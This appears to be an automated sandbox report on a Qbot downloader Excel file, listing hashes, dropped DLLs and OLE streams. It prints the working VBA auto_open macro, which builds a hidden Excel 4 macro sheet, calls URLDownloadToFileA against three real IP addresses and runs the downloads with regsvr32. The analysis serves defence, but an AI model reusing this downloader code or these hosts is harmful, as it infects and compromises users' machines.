SHA1:	74F10E9059BBEAB4CA1C952EA3E5E8ECB8070C99
SHA-256:	5AE0ECBF654451CE81B2129EA9B3B412F79A7B8EF32A4A46403C461A408908A3
SHA-512:	AD072A625A3CD8F3A0AD99A96406705B1D379F29FB6957E9A89CF3A5849F1BF443C36B3F9ADF07FE6D0FE3A22D75B58269B31368998CD3BAA33AF8CCA2E31647
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	15676
Entropy (8bit):	4.534154763699487
Encrypted:	false
SSDEEP:	192:wx211DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:wQxesT20lheZ3waE5D7qxIxkxe
MD5:	FD7E7015E3A393E7881EE7AD51B83485
SHA1:	FAD9FAC2F9412082A04D565CC9729D43218D7239
SHA-256:	A6417497FC703304FC4D9B820F6C73A8754CFF4CC249F40575EC7B69DC9B0E45
SHA-512:	680E2270BFA83165B5F8529C4ACB747A671C78DC78112156525DA5DFA0403D1DFC2A161971AF61D5FED213E988FE38296EAAF5A03B54AE17DD363F8ED4E760D4
Malicious:	false
Preview:	MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .....................uG................E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......\|...K..a...

C:\Users\user\Drezd.red Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	1.6961804656486577
Encrypted:	false
SSDEEP:	1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
MD5:	B19B0AF9A01DD936D091C291B19696C8
SHA1:	862ED0B9586729F2633670CCD7D075D7693908E1
SHA-256:	17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
SHA-512:	9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Joe Sandbox View:	Filename: Compensation-2308017-09272021.xls, Detection: malicious, Browse Filename: Compensation-1730406737-09272021.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

C:\Users\user\Drezd1.red Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	1.6961804656486577
Encrypted:	false
SSDEEP:	1536:92VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:XC6MtAAFNJ5XC5SYCi02r+J
MD5:	B19B0AF9A01DD936D091C291B19696C8
SHA1:	862ED0B9586729F2633670CCD7D075D7693908E1
SHA-256:	17D261EACA2629EF9907D0C00FB2271201E466796F06DCB7232900D711C29330
SHA-512:	9F0CE65AFA00919797A3A75308CF49366D5DCA0C17EA3CFAB70A9E9244E0D5AB6DEC21A3A46C2C609159E0CBF91AF4F10E6A36F3FB7310A5C2B062249AB43DB4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 9%
Joe Sandbox View:	Filename: Compensation-2308017-09272021.xls, Detection: malicious, Browse Filename: Compensation-1730406737-09272021.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!......................... ............................... ....................................... ..p.......\|.... ...............................................................................................................text............................... ..`.edata..p.... ......................@..@.data.... ...0......................@....data...T....P.......$..............@....rdatat.H...........................@....rsrc........ ......................@..@.........P...0...P...............................P.......P...H...........................P.......P..............................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Mon Sep 27 10:38:52 2021, Security: 0
Entropy (8bit):	7.131912306364678
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	#Qbot downloader.xls
File size:	129024
MD5:	b4b3a2223765ac84c9b1b05dbf7c6503
SHA1:	57bc35cb0c7a9ac6e7fcb5dea5c211fe5eda5fe0
SHA256:	3982ae3e61a6ba86d61bd8f017f6238cc9afeb08b785010d686716e8415b6a36
SHA512:	52b33c60f4f3b1043915fc595aaf1684fe558d82c778a8cb078916daa565f36f12d5fe023ea7611c39f0e2c48bb241eb481b02b2160ba4e97f402c9b75cae500
SSDEEP:	3072:Cik3hOdsylKlgxopeiBNhZFGzE+cL2kdAnc6YehWfG+tUHKGDbpmsiilBti2JtqV:vk3hOdsylKlgxopeiBNhZF+E+W2kdAnE
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "#Qbot downloader.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	Test
Last Saved By:	Test
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2021-09-27 09:38:52
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: Module5, Stream Size: 4241

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module5
VBA File Name:	Module5
Stream Size:	4241
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 a2 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff d0 03 00 00 9c 0d 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
Gert
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"


Sheets("Sheet777").Range("H35") = "=HALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

Function Gert()
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet777"
End Function

VBA File Name: Sheet1, Stream Size: 991

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook, Stream Size: 2501

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook
Stream Size:	2501
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 a9 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()
    On Error Resume Next

    If m_isOpenDelayed Then
        m_isOpenDelayed = False
        InitWorkbook
    End If
End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub

VBA File Name: UserForm2, Stream Size: 1182

General
Stream Path:	_VBA_PROJECT_CUR/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1182
Data ASCII:	. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{C7392748-7F28-4EE6-BCFC-6C9C72F3AD88}{96B851A6-6A1B-4177-A71C-36C172A843DA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.18849998853
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.65175227267
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	208
Entropy:	3.33231709703
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . 6 { . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 101831

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	101831
Entropy:	7.65479066874
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T e s t B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 54 65 73 74 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 662

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	662
Entropy:	5.27592988154
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37

Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTlk
File Type:	dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
Stream Size:	30
Entropy:	1.37215976263
Base64 Encoded:	False
Data ASCII:	. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
Data Raw:	01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 116

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	116
Entropy:	3.43722878834
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	302
Entropy:	4.65399600072
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69

Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/f
File Type:	data
Stream Size:	226
Entropy:	3.01175231218
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 ) . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
Data Raw:	00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 6c 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 29 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32

Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/o
File Type:	data
Stream Size:	272
Entropy:	3.6318384866
Base64 Encoded:	True
Data ASCII:	. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 7 8 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 8 3 . 9 6 . 6 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 2 5 0 . 1 4 8 . 2 1 3 / . . . . . . . . . . . . . 5 . . . . . . .
Data Raw:	00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 37 38 2f 01 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4332

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4332
Entropy:	4.42025024054
Base64 Encoded:	False
